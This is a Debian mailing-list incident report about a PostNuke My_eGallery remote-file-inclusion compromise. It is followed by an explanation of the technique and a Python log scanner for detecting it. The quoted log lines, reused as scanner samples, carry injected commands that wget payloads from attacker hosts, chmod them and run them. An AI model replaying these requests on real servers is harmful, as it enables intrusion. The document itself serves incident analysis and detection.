(php?) bug exploit report
Hello debian-security,
One of my servers has been cracked into and I am looking for the weak spots of
the system and also looking for ways to lock the secholes I might (also) have.
The linux box is an up-to-date woody (incl. security updates).
My first question is how come such a thing worked on my box? (I do not know php
myself at all):
"GET //modules/My_eGallery/public/displayCategory.php?basepath=http://geocities.yahoo.com.br/dcha0s/cse.gif?&cmd=id;uname%20-a;pwd;cd%20/;cd%20tmp;wget%20www.fdlsk8.hpg.ig.com.br/telnetd; HTTP/1.1" 200 7047
[*] see bottom of this email for further occurrences
The URL is part of a PostNuke site, and they were able to start up the telnetd binary
by invoking a URL similar to the one above!
Is this a known sechole?
I am providing some further details about these cracks so that others are aware of
similar threats:
PostNuke: The Phoenix Release (0.7.2.6)
(Debian unstable has version 0.732-4.2, so the first thing to do is to backport
the unstable version. Or is it rather a php bug?:
ii libphp-adodb 1.51-1.1 The 'adodb' database abstraction layer for p
ii libphp-phplot 4.4.6-2 The graphic library for php.
ii php3-cgi 3.0.18-23.1woo A server-side, HTML-embedded scripting langu
ii php3-cgi-mysql 3.0.18-23.1woo Mysql module for PHP3 (cgi)
ii php3-doc 3.0.18-23.1woo Documentation for PHP3
ii php4 4.1.2-6woody3 A server-side, HTML-embedded scripting langu
ii php4-cgi 4.1.2-6woody3 A server-side, HTML-embedded scripting langu
ii php4-gd 4.1.2-6woody3 GD module for php4
ii php4-imap 4.1.2-6woody3 IMAP module for php4
ii php4-ldap 4.1.2-6woody3 LDAP module for php4
ii php4-mysql 4.1.2-6woody3 MySQL module for php4
ii php4-pear 4.2.1-3 PEAR - PHP Extension and Application Reposit
ii php4-pear-log 1.1-1 Log module for PEAR
ii php4-pgsql 4.1.2-4 PostgreSQL module for php4
ii phplib 7.2d-3.1 Library for easy writing web applications (s
ii phpmyadmin 2.5.2-1woody2. A set of PHP-scripts to administrate MySQL o
ii phpnuke 6.0-10 A web portal and community system, mostly li
ii phppgadmin 2.4.1-2 A set of PHP-scripts to administrate Postgre
ii phpsysinfo 2.0-3woody1 PHP Based Host Information
)
$modversion['name'] = 'My_eGallery'; // Module Name
$modversion['version'] = '3.1.1'; // Version Number
The telnetd and other ELF executables they used and that were found in /tmp are
the following:
-rwxr-xr-x 1 www-data www-data 2897 ptrace
-rwxrwxrwx 1 www-data www-data 19242 r0nin.txt
-rw-r--r-- 1 www-data www-data 19242 r0nin.txt.1
-rw-r--r-- 1 www-data www-data 19242 r0nin.txt.2
-rw-r--r-- 1 www-data www-data 1325904 r.txt
-rwxr-xr-x 1 www-data www-data 17643 suco.txt
-rwxrwxrwx 1 www-data www-data 170613 telnetd
-rw-r--r-- 1 www-data www-data 170613 telnetd.1
-rw-r--r-- 1 www-data www-data 170613 telnetd.2
-rw-r--r-- 1 www-data www-data 170613 telnetd.3
-rwxr-xr-x 1 www-data www-data 17836 x
-rwxr-xr-x 1 www-data www-data 5013 x0x
-rwsrwsrwt 1 www-data www-data 7180 xiit
-rw-r--r-- 1 www-data www-data 7180 xiit.1
-rw-r--r-- 1 www-data www-data 7180 xiit.2
The following was found in the directory of displayCategory.php:
-rwxr-xr-x 1 www-data www-data 6453 bd.cgi
Some other interesting details:
www-data 11584 0.0 0.1 2536 1288 ? S 18:57 0:00 wget http://www.cyberlordsteam.hpg.ig.com.br/exploits/r.txt
A wget-log file was open in /tmp, containing:
--18:57:51-- http://www.cyberlordsteam.hpg.ig.com.br/exploits/r.txt
=> `r.txt'
Resolving www.cyberlordsteam.hpg.ig.com.br... done.
Connecting to www.cyberlordsteam.hpg.ig.com.br[200.226.137.10]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4,590,900 [text/plain]
3% [> ] 174,224 796.04B/s ETA 1:32:28
I also still have the binaries they used. Is anyone interested in taking a
look at them?
Thank you.
Regs,
Csan
PS 1: Please Cc: me as I am not subscribed to the list. And I wouldn't like to,
if possible.
PS 2: further Apache log crack entries:
200.249.4.237 - - "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://geocities.yahoo.com.br/dcha0s/cse.gif?&cmd=id;uname%20-a;pwd HTTP/1.1" 200 7047
200.249.4.237 - - "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://geocities.yahoo.com.br/dcha0s/cse.gif?&cmd=id;uname%20-a;pwd;cd%20/;cd%20tmp;wget%20www.fdlsk8.hpg.ig.com.br/telnetd;chmod%20777%20telnetd; HTTP/1.1" 200 7047
200.234.12.110 - - "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.jesusaleluia.iwebland.com/dcphp3.gif?&cmd=id;uname%20-a;pwd HTTP/1.1" 200 3856
adsl-67-36-72-129.dsl.sfldmi.ameritech.net - - "GET /index/My_eGallery/public/displayCategory.php?basepath=http://www.jesusaleluia.iwebland.com/dcphp3.gif?&cmd=id;uname%20-a HTTP/1.0" 200 21034
200-171-247-29.customer.telesp.net.br - - "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://iradex.8bit.co.uk/&cmd=uname%20-a;id HTTP/1.1" 200 30021
201-0-210-187.dial-up.telesp.net.br - - "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.bywordonline.com/sc/app.txt?&cmd=uname%20-a;id HTTP/1.1" 200 2097
201-0-210-187.dial-up.telesp.net.br - - "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;wget%20www.anjosdoasfalto.com/r0nin.txt;chmod%20777%20r0nin.txt;./r0nin.txt HTTP/1.1" 200 1625
200-158-210-235.dsl.telesp.net.br - - "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.cimentsorigny.com/app.txt?&cmd=uname%20-a;id HTTP/1.1" 200 2250
201-0-210-29.dial-up.telesp.net.br - - "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.bywordonline.com/sc/app.txt?&cmd=uname%20-a;id HTTP/1.1" 200 2097
frb9-d9bb4672.pool.mediaways.net - - "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://ago.edns.ig3.net&cmd=uname%20-a HTTP/1.1" 200 1215
200-158-210-117.dsl.telesp.net.br - - "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.bywordonline.com/sc/app.txt?&cmd=uname%20-a;id HTTP/1.1" 200 2097
200-158-210-117.dsl.telesp.net.br - - "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;wget%20http://inf3ction.port5.com/xiit;chmod%207777%20xiit;./xiit HTTP/1.1" 200 1610
Csan alias János Holányi
Debian Group leader - Association of Hungarian Linux Users
gpg --keyserver hkp://pgp.mit.edu --recv-keys 82CBB661
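Added example, not from the post above and not from the PostNuke or My_eGallery code (the page does not show the module's source). The requests in the log excerpts have the shape of a remote file inclusion followed by command injection: the basepath parameter is pointed at an attacker-hosted URL, so a script that builds an include path from $basepath and runs under PHP with allow_url_fopen enabled fetches and executes PHP from that host, and the cmd parameter carries the shell commands for that code to run. The trailing "?" on the include URL turns whatever the script appends after basepath into a harmless query string for the attacker's server. That the module builds its include this way is an inference from the request pattern, not something the page confirms. The script below scans Apache access-log lines in the format quoted in the post for exactly that pattern and extracts the commands, the downloaded payloads and the file names to expect in /tmp. The sample lines are constructed from the ones in the post (timestamps omitted, as there), plus one made-up benign request from 10.0.0.5.

```python
#!/usr/bin/env python3
"""Added example: flag remote-file-inclusion + command-injection attempts in
Apache access-log lines and pull out the shell commands and dropped payloads.
Hostnames, paths and URLs in SAMPLE_LOG come from the post; the 10.0.0.5
request is a constructed benign one."""
import re
from urllib.parse import unquote_plus

# Log shape as quoted in the post: host ident user "METHOD target PROTO" status bytes
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ "(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/\d\.\d)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)$'
)
# A parameter value that is itself a URL is the RFI signature: if the script
# include()s it, PHP with allow_url_fopen fetches it from the attacker's host.
REMOTE_SCHEME_RE = re.compile(r'^(https?|ftp)://', re.IGNORECASE)
DOWNLOADERS = {'wget', 'curl', 'lynx', 'fetch'}

SAMPLE_LOG = [  # constructed from the post's entries, timestamps omitted
    '200.249.4.237 - - "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://geocities.yahoo.com.br/dcha0s/cse.gif?&cmd=id;uname%20-a;pwd HTTP/1.1" 200 7047',
    '200.249.4.237 - - "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://geocities.yahoo.com.br/dcha0s/cse.gif?&cmd=id;uname%20-a;pwd;cd%20/;cd%20tmp;wget%20www.fdlsk8.hpg.ig.com.br/telnetd;chmod%20777%20telnetd; HTTP/1.1" 200 7047',
    '10.0.0.5 - - "GET /index.php?module=My_eGallery&cid=3 HTTP/1.1" 200 9120',  # made-up benign request
    '201-0-210-187.dial-up.telesp.net.br - - "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;wget%20www.anjosdoasfalto.com/r0nin.txt;chmod%20777%20r0nin.txt;./r0nin.txt HTTP/1.1" 200 1625',
    '200-158-210-117.dsl.telesp.net.br - - "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;wget%20http://inf3ction.port5.com/xiit;chmod%207777%20xiit;./xiit HTTP/1.1" 200 1610',
]


def parse_query(query):
    """Split the query string by hand: parse_qs in older Pythons also splits
    on ';', which is exactly the separator the injected command chains use."""
    params = []
    for part in query.split('&'):
        if part:
            key, _, value = part.partition('=')
            params.append((unquote_plus(key), unquote_plus(value)))
    return params


def parse_access_line(line):
    """Return a dict for one log line, or None if it does not match the format."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec['path'], _, query = rec['target'].partition('?')
    rec['params'] = parse_query(query)
    return rec


def split_commands(cmd):
    """Break an injected command string into its individual shell commands."""
    return [c.strip() for c in re.split(r'[;|\n]+', cmd) if c.strip()]


def analyse_request(rec):
    """Return a finding if the request carries a remote include or a cmd= chain."""
    remote_includes = [(k, v) for k, v in rec['params'] if REMOTE_SCHEME_RE.match(v)]
    commands = [c for k, v in rec['params'] if k.lower() == 'cmd' for c in split_commands(v)]
    if not remote_includes and not commands:
        return None
    payloads = []
    for c in commands:
        argv = c.split()
        if argv and argv[0] in DOWNLOADERS:
            payloads += [a for a in argv[1:] if not a.startswith('-')]
    return {
        'host': rec['host'],
        'script': rec['path'],
        'status': int(rec['status']),
        'remote_includes': remote_includes,  # (param, URL); note the trailing '?' trick
        'commands': commands,
        'payloads': payloads,                # what the box was told to download
        'executed': [c for c in commands if c.startswith('./')],
    }


def scan(lines):
    """Parse every line and keep only the suspicious requests, in log order."""
    findings = []
    for line in lines:
        rec = parse_access_line(line)
        if rec:
            finding = analyse_request(rec)
            if finding:
                findings.append(finding)
    return findings


def summarize(findings):
    """Indicators to pivot on: attacker sources, include hosts, payload URLs,
    and the file names you should expect to find in /tmp."""
    payloads = {p for f in findings for p in f['payloads']}
    return {
        'attacker_hosts': sorted({f['host'] for f in findings}),
        'include_urls': sorted({u for f in findings for _, u in f['remote_includes']}),
        'payload_urls': sorted(payloads),
        'dropped_files': sorted({p.rstrip('/').rsplit('/', 1)[-1] for p in payloads}),
    }


if __name__ == '__main__':
    found = scan(SAMPLE_LOG)
    for f in found:
        print(f"{f['host']} -> {f['script']} include={[u for _, u in f['remote_includes']]} cmds={f['commands']}")
    print(summarize(found))
```

Run it as-is to see the findings; for a real log, pass the open access-log file to scan(). Two limits worth knowing: parameters are split on "&", so a command chain that itself contains "&&" is cut at that point, and only query-string parameters are seen, not POST bodies. The dropped_files summary (telnetd, r0nin.txt, xiit) can be checked directly against the /tmp listing earlier in the post, and a 200 response whose size differs per injected command is consistent with the command output being returned in the page body.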